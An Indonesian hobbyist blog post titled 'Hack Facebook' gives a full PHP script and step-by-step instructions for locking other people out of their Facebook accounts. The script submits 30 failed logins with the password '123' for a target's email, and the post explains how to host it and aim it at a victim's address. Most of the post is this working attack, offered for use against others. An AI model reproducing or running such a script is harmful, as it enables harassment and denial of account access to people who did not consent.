Warung Internet

Hack Facebook

Tutorial hack facebook yang akan saya share disini memiliki fungsi sama persis dengan software hack facebook yaitu bikin beku / ga bisa buad login facebook seseorang , tapi ini versi webphp :D jadi senjata yang harus anda siapkan adalah :
hosting yang support php dan curl (jangan 000webhost)
dan Notepad :D
caranya mudah , copy script dibawah ini ke notepad :


<?
echo “<html><title>PHP Facebook Freezer</title><head><meta http-equiv=\”refresh\” content=\”600\”></head><body>”;
echo “<br><form method=post>Email : <input name=email><input type=submit value=Submit></form><br><br>”;
$email=$_POST['email'];
$passwd=’123′;
if(isset($email) && isset($passwd)){
$kue=”/tmp/”.rand().”.txt”;
$url=’https://login.facebook.com/login.php’;
$login=”email=$email&pass=$passwd&login=Log In”;
define(“_COK_”, $kue);
curlget($url);
for ($number=1; $number<=30; $number++) {
$data=curlpost($url,$login);
}
echo $data;
}
function curlget($url){
$agent=$_SERVER['HTTP_USER_AGENT'];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_ENCODING, “”);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
function curlpost($url,$post){
$agent=$_SERVER['HTTP_USER_AGENT'];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
curl_setopt($curl, CURLOPT_ENCODING, “”);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
echo “</body></html>”;
?>



setelah kamu berhasil mengkopi script untuk hack facebook diatas , kini saatnya untuk menyimpan dengan nama nomoredisk.Php
setelah itu kamu upload file Fb.Php ke hostinganmu yang suport curl dan php
nih contoh jadinya klik disini
klo file udah di upload kini tinggal main ……… :D ,
buka file yang kamu upload tadi ex: http://wolimierz.org/images/nomoredisk.php
setelah itu masukan dah email target :D , maka dia ga akan bisa login (tapi ga permanent).
x_3b5cf314

Sudah Baca Yang Ini..?



Komentar :

ada 0 Orang Berpendapat ke “Hack Facebook”

Posting Komentar

Bagi sobat-sobat silahkan comment disini, Insya Allah saya comment balik di blog anda, karena setitik kata komentar anda akan sangat berharga untuk kemajuan blog ini, Trims atas kerja samanya...

About Me

Foto Saya
Adri Baraka P.A.
Siswa dari SMKN 3 Buduran ( Perkapalan ) mengambil jurusan Teknik Komputer dan Jaringan ( TKj ). Saya sekarang kelas XI - TKJ 1 no. absen 02
Lihat profil lengkapku

Recent Post

Recent posts with thumbnail

Reader Community

 
This Blog is proudly powered by Blogger.com | Template by Adri Baraka